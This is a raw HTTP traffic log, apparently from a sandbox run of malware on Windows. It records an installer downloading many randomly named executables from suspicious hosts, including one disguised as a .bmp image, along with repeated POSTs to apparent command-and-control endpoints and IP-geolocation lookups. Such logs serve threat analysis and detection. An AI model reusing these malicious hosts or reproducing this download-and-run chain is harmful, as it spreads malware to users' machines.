date: Fri, 05 Nov 2021 00:07:39 GMT
x-envoy-upstream-service-time: 20
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
GET
200
https://ipinfo.io/widget
GET /widget HTTP/1.1
Connection: Keep-Alive
Referer: https://ipinfo.io/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: ipinfo.io
HTTP/1.1 200 OK
access-control-allow-origin: *
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
referrer-policy: strict-origin-when-cross-origin
content-type: application/json; charset=utf-8
content-length: 876
date: Fri, 05 Nov 2021 00:07:40 GMT
x-envoy-upstream-service-time: 16
vary: Accept-Encoding
Via: 1.1 google
Alt-Svc: clear
HEAD
200
http://fouratlinks.com/installpartners/ShareFolder.exe
HEAD /installpartners/ShareFolder.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: fouratlinks.com
Content-Length: 0
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:05:41 GMT
Server: Apache
Last-Modified: Thu, 04 Nov 2021 13:35:16 GMT
ETag: "a0a00-5cff698cc8d00"
Accept-Ranges: bytes
Content-Length: 657920
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://fouratlinks.com/installpartners/ShareFolder.exe
GET /installpartners/ShareFolder.exe HTTP/1.1
Accept: */*
User-Agent: InnoDownloadPlugin/1.5
Host: fouratlinks.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:05:42 GMT
Server: Apache
Last-Modified: Thu, 04 Nov 2021 13:35:16 GMT
ETag: "a0a00-5cff698cc8d00"
Accept-Ranges: bytes
Content-Length: 657920
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://fouratlinks.com/stockmerchandise/zillaCPM/r4XZt5MYHpEdcdmzqr2D.exe
GET /stockmerchandise/zillaCPM/r4XZt5MYHpEdcdmzqr2D.exe HTTP/1.1
Host: fouratlinks.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:05:56 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2021 16:41:58 GMT
ETag: "59a00-5cfbcdaf76180"
Accept-Ranges: bytes
Content-Length: 367104
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
GET
200
http://fouratlinks.com/stockmerchandise/serious_punch_upd/HttpTwcyK3R6gQj7t7EY.exe
GET /stockmerchandise/serious_punch_upd/HttpTwcyK3R6gQj7t7EY.exe HTTP/1.1
Host: fouratlinks.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:06:04 GMT
Server: Apache
Last-Modified: Mon, 01 Nov 2021 16:08:48 GMT
ETag: "88400-5cfbc645a6400"
Accept-Ranges: bytes
Content-Length: 558080
Content-Type: application/x-msdos-program
GET
200
http://fouratlinks.com/stockmerchandise/total_out_hand/v8hBqWuKscbjZRqNatPw.exe
GET /stockmerchandise/total_out_hand/v8hBqWuKscbjZRqNatPw.exe HTTP/1.1
Host: fouratlinks.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:06:07 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2021 17:44:35 GMT
ETag: "37600-5cfd1d8c48dbe"
Accept-Ranges: bytes
Content-Length: 226816
Content-Type: application/x-msdos-program
GET
200
http://fouratlinks.com/Widgets/FolderShare.exe
GET /Widgets/FolderShare.exe HTTP/1.1
Host: fouratlinks.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:06:09 GMT
Server: Apache
Last-Modified: Mon, 27 Sep 2021 13:36:56 GMT
ETag: "bc800-5ccfa30ca2e00"
Accept-Ranges: bytes
Content-Length: 772096
Content-Type: application/x-msdos-program
POST
100
http://requestimedout.com/xenocrates/zoroaster
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
HTTP/1.1 100 Continue
GET
200
http://www.google.com/
GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:06:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2021-11-05-00; expires=Sun, 05-Dec-2021 00:06:15 GMT; path=/; domain=.google.com; Secure
Set-Cookie: NID=511=tl2MPmU5mbdRidhUbu17NjjRJCitvd2V5Ozx7hNj6O9lgD_wcYkksblfoS89-CxjJ9DaAdfkyMRujT2MJHHZy6ZDuXAMm1Zc2ZqyRQSA9GcGLAr8pexsdzdTMbWr7EEnBIaLugpM6Dw1bH4--faiO_4i-jDe6-FLsroRvS9lhc4; expires=Sat, 07-May-2022 00:06:15 GMT; path=/; domain=.google.com; HttpOnly
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:06:49 GMT
Date: Fri, 05 Nov 2021 00:06:49 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:06:49 GMT
Date: Fri, 05 Nov 2021 00:06:49 GMT
Connection: keep-alive
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:06:49 GMT
Date: Fri, 05 Nov 2021 00:06:49 GMT
Connection: keep-alive
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 180
Expect: 100-continue
Accept-Encoding: gzip
Connection: Keep-Alive
HTTP/1.1 100 Continue
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
GET
200
http://45.133.1.107/server.txt
REQUEST
RESPONSE
BODY
GET /server.txt HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 45.133.1.107
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:10 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 04 Nov 2021 12:32:45 GMT
ETag: "13-5cff5b943f0c1"
Accept-Ranges: bytes
Content-Length: 19
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
GET
200
http://212.192.241.15/base/api/statistics.php
REQUEST
RESPONSE
BODY
GET /base/api/statistics.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Host: 212.192.241.15
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:11 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 94
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://212.192.241.15/base/api/getData.php
REQUEST
RESPONSE
BODY
POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 2033
Host: 212.192.241.15
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:12 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://212.192.241.15/base/api/getData.php
REQUEST
RESPONSE
BODY
POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:13 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 108
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
HEAD
200
http://45.133.1.107/download/NiceProcessX64.bmp
REQUEST
RESPONSE
BODY
HEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:13 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
HEAD
200
http://45.133.1.107/download/NiceProcessX64.bmp
REQUEST
RESPONSE
BODY
HEAD /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:13 GMT
Date: Fri, 05 Nov 2021 00:07:13 GMT
Connection: keep-alive
GET
200
http://45.133.1.107/download/NiceProcessX64.bmp
REQUEST
RESPONSE
BODY
GET /download/NiceProcessX64.bmp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 45.133.1.107
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:14 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 11 Sep 2021 15:36:23 GMT
ETag: "4fa00-5cbb9fe84ddf3"
Accept-Ranges: bytes
Content-Length: 326144
Content-Type: image/x-ms-bmp
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,gzip
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
HTTP/1.1 100 Continue
GET
200
http://file.ekkggr3.com/lqosko/p18j/cust51.exe
REQUEST
RESPONSE
BODY
GET /lqosko/p18j/cust51.exe HTTP/1.1
Host: file.ekkggr3.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:16 GMT
Content-Type: application/octet-stream
Content-Length: 1413632
Connection: keep-alive
last-modified: Thu, 21 Oct 2021 09:59:41 GMT
etag: "61713a0d-159200"
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2665
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rm%2BCLOZvJErjZPFFIPO1m3NTaPYIhBRjhZUVik1b5KV4f0RqwKIMP27Fcv6%2FEslP8Wvyy27qKSOz3OU6C3wPjaiEoIkoz1vgIHVMO8MxCD7CpKfZsWLdKAH52FWJ1HbnUPv1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d74638e8fccd-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:16 GMT
Date: Fri, 05 Nov 2021 00:07:16 GMT
Connection: keep-alive
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:17 GMT
Date: Fri, 05 Nov 2021 00:07:17 GMT
Connection: keep-alive
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 224
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
GET
200
http://ip-api.com/json/
REQUEST
RESPONSE
BODY
GET /json/ HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
viewport-width: 1920
Host: ip-api.com
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:17 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 276
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET
200
http://45.9.20.156/pub.php?pub=five
REQUEST
RESPONSE
BODY
GET /pub.php?pub=five HTTP/1.1
Host: 45.9.20.156
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:18 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Description: File Transfer
Content-Disposition: attachment; filename=setup.exe
Content-Transfer-Encoding: binary
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/octet-stream
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:18 GMT
Date: Fri, 05 Nov 2021 00:07:18 GMT
Connection: keep-alive
GET
200
http://staticimg.youtuuee.com/api/fbtime
REQUEST
RESPONSE
BODY
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: staticimg.youtuuee.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
POST
200
http://staticimg.youtuuee.com/api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d
REQUEST
RESPONSE
BODY
POST /api/?sid=578995&key=b4a44f7ae92b9b3dfe2bcb545627cb4d HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 289
Host: staticimg.youtuuee.com
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 05 Nov 2021 00:07:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.21
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:19 GMT
Date: Fri, 05 Nov 2021 00:07:19 GMT
Connection: keep-alive
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
GET
200
http://cloutingservicedb.su/campaign2/autosubplayer.exe
REQUEST
RESPONSE
BODY
GET /campaign2/autosubplayer.exe HTTP/1.1
Host: cloutingservicedb.su
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:20 GMT
Content-Type: text/html; charset=iso-8859-1
Transfer-Encoding: chunked
Connection: keep-alive
x-powered-by: PHP/7.4.25
vary: Accept-Encoding
x-turbo-charged-by: LiteSpeed
Cache-Control: max-age=14400
CF-Cache-Status: HIT
Age: 2825
Last-Modified: Thu, 04 Nov 2021 23:20:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cDtFisfT7WinEelXkS8cJDAO61%2FuA4%2B5AScL5WMdlYMY7yJEoq9Dd4naswqWJM%2B7ID8X0JjWNatzwNMwh1Kl3Fof3zukV1Tn%2FE1erBJTEyun6h%2BhRkLsDqjIJc1urf4x59mZEAEhTg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 6a91d762cc5a0a66-KIX
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:20 GMT
Date: Fri, 05 Nov 2021 00:07:20 GMT
Connection: keep-alive
POST
200
http://212.192.241.15/base/api/getData.php
REQUEST
RESPONSE
BODY
POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 212.192.241.15
HTTP/1.1 200 OK
Date: Fri, 05 Nov 2021 00:07:21 GMT
Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
X-Powered-By: PHP/7.3.28
Content-Length: 4800
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
POST
100
http://requestimedout.com/xenocrates/zoroaster
REQUEST
RESPONSE
BODY
POST /xenocrates/zoroaster HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: requestimedout.com
Content-Length: 264
Expect: 100-continue
Accept-Encoding: gzip
HTTP/1.1 100 Continue
HEAD
200
http://193.56.146.36/udptest.exe
REQUEST
RESPONSE
BODY
HEAD /udptest.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.56.146.36
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 462336
Connection: keep-alive
Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT
ETag: "70e00-5cfff534e3a12"
Accept-Ranges: bytes
GET
200
http://apps.identrust.com/roots/dstrootcax3.p7c
REQUEST
RESPONSE
BODY
GET /roots/dstrootcax3.p7c HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: apps.identrust.com
HTTP/1.1 200 OK
X-XSS-Protection: 1; mode=block
Strict-Transport-Security: max-age=15768000
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Security-Policy: default-src 'self' *.identrust.com
Last-Modified: Fri, 29 Oct 2021 21:49:30 GMT
ETag: "37d-5cf84cd446e80"
Accept-Ranges: bytes
Content-Length: 893
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Type: application/pkcs7-mime
Cache-Control: max-age=3600
Expires: Fri, 05 Nov 2021 01:07:22 GMT
Date: Fri, 05 Nov 2021 00:07:22 GMT
Connection: keep-alive
GET
200
http://193.56.146.36/udptest.exe
REQUEST
RESPONSE
BODY
GET /udptest.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: 193.56.146.36
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 05 Nov 2021 00:07:22 GMT
Content-Type: application/x-msdos-program
Content-Length: 462336
Connection: keep-alive
Last-Modified: Fri, 05 Nov 2021 00:00:04 GMT
ETag: "70e00-5cfff534e3a12"
Accept-Ranges: bytes
HEAD
302
http://www.hzradiant.com/askhelp42/askinstall42.exe
REQUEST
RESPONSE
BODY
HEAD /askhelp42/askinstall42.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: www.hzradiant.com
Content-Length: 0
Cache-Control: no-cache
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 05 Nov 2021 00:07:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.6.40
Location: http://www.hzradiant.com/askinstall42.exe
HEAD
302
http://www.mrwenshen.com/askhelp59/askinstall59.exe
REQUEST
RESPONSE
BODY
HEAD /askhelp59/askinstall59.exe HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
